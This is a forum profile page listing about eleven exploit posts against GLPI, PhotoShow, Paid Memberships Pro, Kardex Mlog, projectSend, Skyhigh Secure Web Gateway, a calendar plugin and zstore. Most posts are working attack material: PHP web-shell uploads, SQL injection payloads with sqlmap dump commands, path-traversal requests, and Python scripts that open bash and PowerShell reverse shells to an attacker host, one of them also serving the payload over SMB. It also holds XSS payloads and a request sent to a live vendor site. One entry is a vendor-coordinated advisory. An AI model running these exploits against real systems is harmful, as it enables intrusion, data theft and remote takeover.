Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    GLPI Cartography Plugin v6.0.0 - Unauthenticated Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: GLPI Cartography Plugin v6.0.0 - Unauthenticated Remote Code Execution (RCE) # Date of found: 11 Jun 2022 # Application: GLPI Cartography < 6.0.0 # Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/ # Software Link: https://github.com/InfotelGLPI/positions # Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/ # Tested on: Ubuntu 22.04 # CVE: CVE-2022-34128 # PoC POST /marketplace/positions/front/upload.php?name=poc.php HTTP/1.1 Host: 192.168.56.113 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Length: 39 Origin: http://192.168.56.113 Connection: close <?php echo system($_GET["cmd"]); ?>
  2. HireHackking

    GLPI v10.0.2 - SQL Injection (Authentication Depends on Configuration)

    HireHackking posted a blog entry in Hacker Technology
    # ADVISORY INFORMATION # Exploit Title: GLPI v10.0.2 - SQL Injection (Authentication Depends on Configuration) # Date of found: 11 Jun 2022 # Application: GLPI >=10.0.0, < 10.0.3 # Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/ # Software Link: https://github.com/glpi-project/glpi # Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/ # Tested on: Ubuntu 22.04 # CVE: CVE-2022-31056 # PoC POST /front/change.form.php HTTP/1.1 Host: acme.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Content-Type: multipart/form-data; boundary=---------------------------190705055020145329172298897156 Content-Length: 4836 Cookie: glpi_8ac3914e6055f1dc4d1023c9bbf5ce82_rememberme=%5B2%2C%22wSQx0155YofQ n53WMozDGuSI1p2KAzxZ392stmrX%22%5D; glpi_8ac3914e6055f1dc4d1023c9bbf5ce82=f3cciacap6rqs2bcoaio5lmikg -----------------------------190705055020145329172298897156 Content-Disposition: form-data; name="id" 0 -----------------------------190705055020145329172298897156 Content-Disposition: form-data; name="_glpi_csrf_token" 752d2ff606bf360d809b682f0d9da9c23b290b31453f493f4924e16e77bbba35 -----------------------------190705055020145329172298897156 Content-Disposition: form-data; name="_actors" {"requester":[],"observer":[],"assign":[{"itemtype":"User","items_id":"2','2',); INSERT INTO `glpi_documenttypes` (`name`, `ext`, `icon`, `mime`, `is_uploadable`) VALUES('PHP', 'php', 'jpg-dist.png', 'application/x-php', 1); ---'","use_notification":"1","alternative_email":""}]} -----------------------------190705055020145329172298897156-- If you manipulate the filename uploaded to the system, the file is placed under /files/_tmp/. HTTP GET request required to trigger the issue is as follows. POST /ajax/fileupload.php HTTP/1.1 Host: 192.168.56.113 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Glpi-Csrf-Token: bb1c7f6cd4c1865838b234b4f703172a57c19c276d11eb322936d770d75c6dd7 X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------102822935214007887302871396841 Content-Length: 559 Origin: http://acme.com Cookie: glpi_8ac3914e6055f1dc4d1023c9bbf5ce82_rememberme=%5B2%2C%22wSQx0155YofQn53WMozDGuSI1p2KAzxZ392stmrX%22%5D; glpi_8ac3914e6055f1dc4d1023c9bbf5ce82=f3cciacap6rqs2bcoaio5lmikg -----------------------------102822935214007887302871396841 Content-Disposition: form-data; name="name" _uploader_filename -----------------------------102822935214007887302871396841 Content-Disposition: form-data; name="showfilesize" 1 -----------------------------102822935214007887302871396841 Content-Disposition: form-data; name="_uploader_filename[]"; filename="test.php" Content-Type: application/x-php Output: <?php echo system($_GET['cmd']); ?> -----------------------------102822935214007887302871396841-- # POC URL http://192.168.56.113/files/_tmp/poc.php?cmd=
  3. HireHackking

    GLPI Activity v3.1.0 - Authenticated Local File Inclusion on Activity plugin

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: GLPI Activity v3.1.0 - Authenticated Local File Inclusion on Activity plugin # Date of found: 11 Jun 2022 # Application: GLPI Activity < 3.1.0 # Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/ # Software Link: https://github.com/InfotelGLPI/activity # Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/ # Tested on: Ubuntu 22.04 # CVE : CVE-2022-34125 # PoC GET /marketplace/activity/front/cra.send.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1 Host: 192.168.56.113 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close
  4. HireHackking

    PhotoShow 3.0 - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: PhotoShow 3.0 - Remote Code Execution # Date: January 11, 2023 # Exploit Author: LSCP Responsible Disclosure Lab # Detailed Bug Description: https://lscp.llc/index.php/2021/07/19/how-white-box-hacking-works-remote-code-execution-and-stored-xss-in-photoshow-3-0/ # Vendor Homepage: https://github.com/thibaud-rohmer # Software Link: https://github.com/thibaud-rohmer/PhotoShow # Version: 3.0 # Tested on: Ubuntu 20.04 LTS # creds of a user with admin privileges required import sys import requests import base64 import urllib.parse if(len(sys.argv)!=6): print('Usage: \n\tpython3 ' + sys.argv[0] + ' "login" ' + '"password" "target_ip" "attacker_ip" "attacker_nc_port"') quit() login=sys.argv[1] password=sys.argv[2] targetIp = sys.argv[3] attackerIp = sys.argv[4] attackerNcPort = sys.argv[5] def main(): session = requests.Session() #login as admin user logInSession(session, targetIp, login, password) #change application behaviour for handling .mp4 video uploadExpoit(session, targetIp, attackerIp, attackerNcPort) #send the shell to attaker's nc by uploading .mp4 video sendMP4Video(session, targetIp) print("Check your netcat") def logInSession(session, targetIp, login, password): session.headers.update({'Content-Type' : "application/x-www-form-urlencoded"}) data = "login="+login+"&password="+password url = "http://"+targetIp+"/?t=Login" response= session.post(url, data=data) phpsessid=response.headers.get("Set-Cookie").split(";")[0] session.headers.update({'Cookie' : phpsessid}) def uploadExpoit(session, targetIp, attackerIp, attackerNcPort): exiftranPathInjection=createInjection(attackerIp, attackerNcPort) url = "http://"+targetIp+"/?t=Adm&a=Set" data = "name=PhotoShow&site_address=&loc=default.ini&user_theme=Default&" \ + "rss=on&max_comments=50&thumbs_size=200&fbappid=&ffmpeg_path=&encode_video=on&"\ + "ffmpeg_option=-threads+4+-vcodec+libx264+-acodec+libfdk_aac&rotate_image=on&"\ + exiftranPathInjection session.post(url, data=data).content.decode('utf8') def createInjection(attakerIp, attackerNcPort): textToEncode = "bash -i >& /dev/tcp/"+attackerIp+"/"+attackerNcPort+" 0>&1" b64Encoded = base64.b64encode(textToEncode.encode("ascii")) strb64 = str(b64Encoded) strb64 = strb64[2:len(strb64)-1] injection = {"exiftran_path":"echo "+ strb64 +" | base64 -d > /tmp/1.sh ;/bin/bash /tmp/1.sh"} return urllib.parse.urlencode(injection) def sendMP4Video(session, targetIp): session.headers.update({'Content-Type' : "multipart/form-data; "\ +"boundary=---------------------------752343701418612422363028651"}) url = "http://"+targetIp+"/?a=Upl" data = """-----------------------------752343701418612422363028651\r Content-Disposition: form-data; name="path"\r \r \r -----------------------------752343701418612422363028651\r Content-Disposition: form-data; name="inherit"\r \r 1\r -----------------------------752343701418612422363028651\r Content-Disposition: form-data; name="images[]"; filename="a.mp4"\r Content-Type: video/mp4\r \r a\r -----------------------------752343701418612422363028651--\r """ try: session.post(url, data=data, timeout=0.001) except requests.exceptions.ReadTimeout: pass if __name__ =="__main__": main()
  5. HireHackking

    Paid Memberships Pro v2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/env python # Exploit Title: Paid Memberships Pro v2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection # Exploit Author: r3nt0n # CVE: CVE-2023-23488 # Date: 2023/01/24 # Vulnerability discovered by Joshua Martinelle # Vendor Homepage: https://www.paidmembershipspro.com # Software Link: https://downloads.wordpress.org/plugin/paid-memberships-pro.2.9.7.zip # Advisory: https://github.com/advisories/GHSA-pppw-hpjp-v2p9 # Version: < 2.9.8 # Tested on: Debian 11 - WordPress 6.1.1 - Paid Memberships Pro 2.9.7 # # Running this script against a WordPress instance with Paid Membership Pro plugin # tells you if the target is vulnerable. # As the SQL injection technique required to exploit it is Time-based blind, instead of # trying to directly exploit the vuln, it will generate the appropriate sqlmap command # to dump the whole database (probably very time-consuming) or specific chose data like # usernames and passwords. # # Usage example: python3 CVE-2023-23488.py http://127.0.0.1/wordpress import sys import requests def get_request(target_url, delay="1"): payload = "a' OR (SELECT 1 FROM (SELECT(SLEEP(" + delay + ")))a)-- -" data = {'rest_route': '/pmpro/v1/order', 'code': payload} return requests.get(target_url, params=data).elapsed.total_seconds() print('Paid Memberships Pro < 2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection\n') if len(sys.argv) != 2: print('Usage: {} <target_url>'.format("python3 CVE-2023-23488.py")) print('Example: {} http://127.0.0.1/wordpress'.format("python3 CVE-2023-23488.py")) sys.exit(1) target_url = sys.argv[1] try: print('[-] Testing if the target is vulnerable...') req = requests.get(target_url, timeout=15) except: print('{}[!] ERROR: Target is unreachable{}'.format(u'\033[91m',u'\033[0m')) sys.exit(2) if get_request(target_url, "1") >= get_request(target_url, "2"): print('{}[!] The target does not seem vulnerable{}'.format(u'\033[91m',u'\033[0m')) sys.exit(3) print('\n{}[*] The target is vulnerable{}'.format(u'\033[92m', u'\033[0m')) print('\n[+] You can dump the whole WordPress database with:') print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump'.format(target_url)) print('\n[+] To dump data from specific tables:') print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users'.format(target_url)) print('\n[+] To dump only WordPress usernames and passwords columns (you should check if users table have the default name):') print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users -C user_login,user_pass'.format(target_url)) sys.exit(0)
  6. HireHackking

    Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution)

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/env python3 # Exploit Title: Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution) # Date: 12/13/2022 # Exploit Author: Patrick Hener # Vendor Homepage: https://www.kardex.com/en/mlog-control-center # Version: 5.7.12+0-a203c2a213-master # Tested on: Windows Server 2016 # CVE : CVE-2023-22855 # Writeup: https://hesec.de/posts/CVE-2023-22855 # # You will need to run a netcat listener beforehand: ncat -lnvp <port> # import requests, argparse, base64, os, threading from impacket import smbserver def probe(target): headers = { "Accept-Encoding": "deflate" } res = requests.get(f"{target}/\\Windows\\win.ini", headers=headers) if "fonts" in res.text: return True else: return False def gen_payload(lhost, lport): rev_shell_blob = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()' rev_shell_blob_b64 = base64.b64encode(rev_shell_blob.encode('UTF-16LE')) payload = f"""<#@ template language="C#" #> <#@ Import Namespace="System" #> <#@ Import Namespace="System.Diagnostics" #> <# var proc1 = new ProcessStartInfo(); string anyCommand; anyCommand = "powershell -e {rev_shell_blob_b64.decode()}"; proc1.UseShellExecute = true; proc1.WorkingDirectory = @"C:\Windows\System32"; proc1.FileName = @"C:\Windows\System32\cmd.exe"; proc1.Verb = "runas"; proc1.Arguments = "/c "+anyCommand; Process.Start(proc1); #>""" return payload def start_smb_server(lhost): server = smbserver.SimpleSMBServer(listenAddress=lhost, listenPort=445) server.addShare("SHARE", os.getcwd(), '') server.setSMB2Support(True) server.setSMBChallenge('') server.start() def trigger_vulnerability(target, lhost): headers = { "Accept-Encoding": "deflate" } requests.get(f"{target}/\\\\{lhost}\\SHARE\\exploit.t4", headers=headers) def main(): # Well, args parser = argparse.ArgumentParser() parser.add_argument('-t', '--target', help='Target host url', required=True) parser.add_argument('-l', '--lhost', help='Attacker listening host', required=True) parser.add_argument('-p', '--lport', help='Attacker listening port', required=True) args = parser.parse_args() # Probe if target is vulnerable print("[*] Probing target") if probe(args.target): print("[+] Target is alive and File Inclusion working") else: print("[-] Target is not alive or File Inclusion not working") exit(-1) # Write payload to file print("[*] Writing 'exploit.t4' payload to be included later on") with open("exploit.t4", 'w') as template: template.write(gen_payload(args.lhost, args.lport)) template.close() # Start smb server in background print("[*] Starting SMB Server in the background") smb_server_thread = threading.Thread(target=start_smb_server, name="SMBServer", args=(args.lhost,)) smb_server_thread.start() # Rev Shell reminder print("[!] At this point you should have spawned a rev shell listener") print(f"[i] 'ncat -lnvp {args.lport}' or 'rlwrap ncat -lnvp {args.lport}'") print("[?] Are you ready to trigger the vuln? Then press enter!") input() # Wait for input then continue # Trigger vulnerability print("[*] Now triggering the vulnerability") trigger_vulnerability(args.target, args.lhost) # Exit print("[+] Enjoy your shell. Bye!") os._exit(1) if __name__ == "__main__": main()
  7. HireHackking

    projectSend r1605 - Remote Code Exectution RCE

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: projectSend r1605 - Remote Code Exectution RCE Application: projectSend Version: r1605 Bugs: rce via file extension manipulation Technology: PHP Vendor URL: https://www.projectsend.org/ Software Link: https://www.projectsend.org/ Date of found: 26-01-2023 Author: Mirabbas Ağalarov Tested on: Linux POC video: https://youtu.be/Ln7KluDfnk4 2. Technical Details & POC ======================================== 1.The attacker first creates a txt file and pastes the following code. Next, the Attacker changes the file extension to jpg. Because the system php,sh,exe etc. It does not allow files. bash -i >& /dev/tcp/192.168.100.18/4444 0>&1 2.Then the attacker starts listening for ip and port nc -lvp 4444 3.and when uploading file it makes http request as below.file name should be like this openme.sh;jpg POST /includes/upload.process.php HTTP/1.1 Host: localhost Content-Length: 525 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-platform: "Linux" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0enbZuQQAtahFVjI Accept: */* Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/upload.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59 Connection: close ------WebKitFormBoundary0enbZuQQAtahFVjI Content-Disposition: form-data; name="name" openme.sh;jpg ------WebKitFormBoundary0enbZuQQAtahFVjI Content-Disposition: form-data; name="chunk" 0 ------WebKitFormBoundary0enbZuQQAtahFVjI Content-Disposition: form-data; name="chunks" 1 ------WebKitFormBoundary0enbZuQQAtahFVjI Content-Disposition: form-data; name="file"; filename="blob" Content-Type: application/octet-stream bash -i >& /dev/tcp/192.168.100.18/4444 0>&1 ------WebKitFormBoundary0enbZuQQAtahFVjI-- 4.In the second request, we do this to the filename section at the bottom. openme.sh POST /files-edit.php?ids=34 HTTP/1.1 Host: localhost Content-Length: 1016 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc8btjvyb3An7HcmA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/files-edit.php?ids=34&type=new Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59 Connection: close ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="csrf_token" 66540808a4bd64c0f0566e6c20a4bc36c49dfac41172788424c6924b15b18d02 ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="file[1][id]" 34 ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="file[1][original]" openme.sh;.jpg ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="file[1][file]" 1674759035-52e51cf3f58377b8a687d49b960a58dfc677f0ad-openmesh.jpg ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="file[1][name]" openme.sh ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="file[1][description]" ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="file[1][expiry_date]" 25-02-2023 ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="save" ------WebKitFormBoundaryc8btjvyb3An7HcmA-- And it doesn't matter who downloads your file. if it opens then reverse shell will be triggered and rce private youtube video poc : https://youtu.be/Ln7KluDfnk4
  8. HireHackking

    Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS) Product: Secure Web Gateway Affected Versions: 10.2.11, potentially other versions Fixed Versions: 10.2.17, 11.2.6, 12.0.1 Vulnerability Type: Cross-Site Scripting Security Risk: high Vendor URL: https://www.skyhighsecurity.com/en-us/products/secure-web-gateway.html Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2022-002 Advisory Status: published CVE: CVE-2023-0214 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0214 Introduction ============ "Skyhigh Security Secure Web Gateway (SWG) is the intelligent, cloud-native web security solution that connects and secures your workforce from malicious websites and cloud apps—from anywhere, any application, and any device." (from the vendor's homepage) More Details ============ The Secure Web Gateway's (SWG) block page, which is displayed when a request or response is blocked by a rule, can contain static files such as images, stylesheets or JavaScript code. These files are embedded using special URL paths. Consider the following excerpt of a block page: ------------------------------------------------------------------------ <html> <!-- FileName: index.html Language: [en] --> <!--Head--> <head> <meta content="text/html; charset=UTF-8" http-equiv="Content-Type"> <meta http-equiv="X-UA-Compatible" content="IE=7" /> <title>McAfee Web Gateway - Notification</title> <script src="/mwg-internal/de5fs23hu73ds/files/javascript/sw.js" type="text/javascript" ></script> <link rel="stylesheet" href="/mwg-internal/de5fs23hu73ds/files/default/stylesheet.css" /> </head> ------------------------------------------------------------------------ Static content is loaded from URL paths prefixed with "/mwg-internal/de5fs23hu73ds/". It was discovered that paths with this prefix are intercepted and directly handled by the SWG no matter on which domain they are accessed. While the prefix can be configured in the SWG, attackers can also obtain it using another currently undisclosed vulnerability. By reverse engineering the file "libSsos.so" and analysing JavaScript code, it was possible to derive the API of the "Ssos" plugin's "SetLoginToken" action. Through the following call using the command-line HTTP client curl, the behaviour of the plugin was further analysed: ------------------------------------------------------------------------ $ curl --proxy http://192.168.1.1:8080 -i 'https://gateway.example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=v&c=c&p=p' HTTP/1.0 200 OK P3P: p Connection: Keep-Alive Set-Cookie: MwgSso=v; Path=/; Max-Age=240; Content-Type: application/javascript Content-Length: 2 X-Frame-Options: deny c; ------------------------------------------------------------------------ The response embeds the values of the three URL parameters "v", "c" and "p". The value for "p" is embedded as value of the "P3P" header, the value of "c" as the response body and the value of "v" as the value of the cookie "MwgSso". It is also possible to include newline or carriage return characters in the parameter value which are not encoded in the output. Consequently, if the value of the parameter "p" contains a line break, arbitrary headers can be injected. If two line breaks follow, an arbitrary body can be injected. If a suitable "Content-Length" header is injected, the remaining headers and body of the original response will be ignored by the browser. This means that apart from the initial "P3P" header, an arbitrary response can be generated. For example, a page containing JavaScript code could be returned, resulting in a cross-site scripting attack. Consequently, attackers can construct URL paths that can be appended to any domain and cause an arbitrary response to be returned if the URL is accessed through the SWG. This could be exploited by distributing such URLs or even by offering a website which performs an automatic redirect to any other website using such a URL. As a result, the SWG exposes its users to self-induced cross-site scripting vulnerabilities in any website. Proof of Concept ================ In the following request, the "p" parameter is used to inject suitable "Content-Type" and "Content-Length" headers, as well as an arbitrary HTML response body. ------------------------------------------------------------------------ $ curl --proxy http://192.168.1.1:8080 'https://gateway.example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=v&c=c&p=p%0aContent-Type: text/html%0aContent-Length: 27%0a%0a<h1>RedTeam Pentesting</h1>' HTTP/1.0 200 OK P3P: p Content-Type: text/html Content-Length: 27 <h1>RedTeam Pentesting</h1> ------------------------------------------------------------------------ As mentioned above, the HTTP response body could also include JavaScript code designed to interact with the domain specified in the URL resulting in a cross-site scripting vulnerability. Workaround ========== None. Fix === According to the vendor, the vulnerability is mitigated in versions 10.2.17, 11.2.6 and 12.0.1 of the Secure Web Gateway. This was not verified by RedTeam Pentesting GmbH. The vendor's security bulletin can be found at the following URL: https://kcm.trellix.com/corporate/index?page=content&id=SB10393 Security Risk ============= The vulnerability could be used to perform cross-site scripting attacks against users of the SWG in context of any domain. Attackers only need to convince users to open a prepared URL or visit an attacker's website that could perform an automatic redirect to an exploit URL. This exposes any website visited through the SWG to the various risks and consequences of a cross-site scripting vulnerability such as account takeover. As a result, this vulnerability poses a high risk. Timeline ======== 2022-07-29 Vulnerability identified 2022-10-20 Customer approved disclosure to vendor 2022-10-20 Vulnerability was disclosed to the vendor 2023-01-17 Patch released by vendor for versions 10.2.17, 11.2.6 and 12.0.1. 2023-01-26 Detailed advisory released by RedTeam Pentesting GmbH RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Alter Posthof 1 Fax : +49 241 510081-99 52062 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen
  9. HireHackking

    Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS) # Date: 2022-05-25 # Exploit Author: Mostafa Farzaneh # WPScan page: https://wpscan.com/vulnerability/95f92062-08ce-478a-a2bc-6d026adf657c # Vendor Homepage: https://wordpress.org/plugins/cp-multi-view-calendar/ # Software Link: https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.4.06.zip # Version: 1.4.06 # Tested on: Linux # CVE : CVE-2022-2846 # Description: The Calendar Event Multi View WordPress plugin before 1.4.07 does not have any authorisation and CSRF checks in place when creating an event, and is also lacking sanitisation as well as escaping in some of the event fields. This could allow unauthenticated attackers to create arbitrary events and put Cross-Site Scripting payloads in it. #POC and exploit code: As an unauthenticated user, to add a malicious event (on October 6th, 2022) to the calendar with ID 1, open the code below <html> <body> <form action=" https://example.com/?cpmvc_do_action=mvparse&f=datafeed&calid=1&month_index=0&method=adddetails" method="POST"> <input type="hidden" name="Subject" value='"><script>alert(/XSS/)</script>' /> <input type="hidden" name="colorvalue" value="#f00" /> <input type="hidden" name="rrule" value="" /> <input type="hidden" name="rruleType" value="" /> <input type="hidden" name="stpartdate" value="10/6/2022" /> <input type="hidden" name="stparttime" value="00:00" /> <input type="hidden" name="etpartdate" value="10/6/2022" /> <input type="hidden" name="etparttime" value="00:00" /> <input type="hidden" name="stpartdatelast" value="10/6/2022" /> <input type="hidden" name="etpartdatelast" value="10/6/2022" /> <input type="hidden" name="stparttimelast" value="" /> <input type="hidden" name="etparttimelast" value="" /> <input type="hidden" name="IsAllDayEvent" value="1" /> <input type="hidden" name="Location" value="CSRF" /> <input type="hidden" name="Description" value='<p style="text-align: left;">CSRF</p>' /> <input type="hidden" name="timezone" value="4.5" /> <input type="submit" value="Submit request" /> </form> </body> </html> The XSS will be triggered when viewing the related event
  10. HireHackking

    zstore 6.6.0 - Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    ## Exploit Title: zstore 6.6.0 - Cross-Site Scripting (XSS) ## Development: nu11secur1ty ## Date: 01.29.2023 ## Vendor: https://zippy.com.ua/ ## Software: https://github.com/leon-mbs/zstore/releases/tag/6.5.4 ## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/zippy/zstore-6.5.4 ## Description: The value of manual insertion `point 1` is copied into the HTML document as plain text between tags. The payload giflc<img src=a onerror=alert(1)>c0yu0 was submitted in the manual insertion point 1. This input was echoed unmodified in the application's response. ## STATUS: HIGH Vulnerability [+] Exploit: ```GET GET /index.php?p=%41%70%70%2f%50%61%67%65%73%2f%43%68%61%74%67%69%66%6c%63%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%79%6f%75%74%75%62%65%2e%63%6f%6d%2f%77%61%74%63%68%3f%76%3d%6d%68%45%76%56%39%51%37%7a%66%45%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e%0a HTTP/2 Host: store.zippy.com.ua Cookie: PHPSESSID=f816ed0ddb0c43828cb387f992ac8521; last_chat_id=439 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://store.zippy.com.ua/index.php?q=p:App/Pages/Main Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 ``` [+] Response: ``` HTTP/2 200 OK Server: nginx Date: Sun, 29 Jan 2023 07:27:55 GMT Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Ray: p529:0.010/wn19119:0.010/wa19119:D=12546 Class \App\Pages\Chatgiflc<a href="https:\\www.youtube.com\watch?v=mhEvV9Q7zfE"><img src=https:\\media.tenor.com\-K9sHxXAb-cAAAAC\shame-on-you-patricia.gif"> does not exist<br>82<br>/home/zippy00/zippy.com.ua/store/vendor/leon-mbs/zippy/core/webapplication.php<br> ``` ## Proof and Exploit: [href](https://streamable.com/aadj5c) ## Reference: [href](https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected) -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
  11. HireHackking

    Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
